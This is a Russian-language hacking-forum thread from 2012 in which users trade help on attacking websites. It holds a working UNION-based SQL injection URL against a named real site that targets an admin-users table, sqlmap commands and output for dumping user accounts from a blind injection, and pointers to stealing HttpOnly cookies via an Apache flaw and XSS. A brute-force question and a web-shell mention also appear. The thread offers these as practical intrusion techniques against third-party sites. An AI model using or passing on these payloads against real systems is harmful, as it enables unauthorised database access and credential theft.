HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.06.2012, 02:03
LelouchMe
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами: 7342166

Репутация: 0
По умолчанию

Цитата:
Сообщение от d1v  
на тебя он матерится!
/thread43966.html
Всё сделал как там, и?
 
Ответить с цитированием

  #2  
Старый 28.06.2012, 02:08
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от LelouchMe  
Всё сделал как там, и?
не лги мне. читай заново.
 
Ответить с цитированием

  #3  
Старый 28.06.2012, 02:14
LelouchMe
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами: 7342166

Репутация: 0
По умолчанию

Цитата:
Сообщение от d1v  
не лги мне. читай заново.
да кавычки видно фильтрует вот и всё...(
 
Ответить с цитированием

  #4  
Старый 28.06.2012, 02:15
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами: 8265206

Репутация: 84


По умолчанию

Цитата:
Сообщение от LelouchMe  
Всё сделал как там, и?
Таблицу захекси

Код:
http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM%20%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=0x6161646d5f7573657273+LIMIT+0,1+--+
 
Ответить с цитированием

  #5  
Старый 28.06.2012, 14:39
Dmit3Y
Познающий
Регистрация: 19.07.2010
Сообщений: 45
С нами: 8324246

Репутация: 0
По умолчанию

Вопрос по склмап.

Нашел слепую иньекцию. sqlmap подтвердил что это иньекция, вытащил список бд и всех таблиц. Однако, когда попытался вытащить акк админа (из другой базы. имена взял из вывода склмапа) он что-то странно себя вел.

Иньекция:

Код:
---
Place: GET
Parameter: rec
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: rec=83990 AND SLEEP(5)
---
Пытаюсь получить хоть что-то из бд:

Код:
./sqlmap.py  --url=адрес --sql-query="SELECT name  FROM db_name.dle_users;"
Вывод:

Код:
[09:27:24] [WARNING] the SQL query provided does not return any output
[09:27:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
SELECT name FROM db_name.dle_users;:     None
Любые попытки получить информация заканчиваются именно так.

Один раз был такой вывод:

Код:
SELECT user_id FROM db_name.dle_users; [4]:[*] B[*] [*] ![*] A
Что делать? Попытки создать нового пользователя тоже провалились..Я думаю если он увидел список таблиц, то значит права на чтение точно есть. Или я не прав? Тогда должна быть возможность сделать выборку.
 
Ответить с цитированием

  #6  
Старый 28.06.2012, 15:06
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

to Dmit3Y

Код:
-u "http://site.com/" --dump -D db_name -T dle_users -C name --start 1 --stop 10
 
Ответить с цитированием

  #7  
Старый 28.06.2012, 23:40
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от +toxa+  
у нужных тебе куков установлен флаг
HttpOnly
. Проблему решит метод TRACE, но на практике почти не юзается.
Не только TRACE

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053

Цитата:
Сообщение от None  
01/28/2012
protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
 
Ответить с цитированием

  #8  
Старый 29.06.2012, 00:00
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

to Dad69

Получение доступа к HttpOnly Cookie через XSS -> Link
 
Ответить с цитированием

  #9  
Старый 29.06.2012, 18:20
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Существует ли локальный mysql брут?
 
Ответить с цитированием

  #10  
Старый 29.06.2012, 18:31
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от попугай  
Существует ли локальный mysql брут?
Вроде в WSO есть... не?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.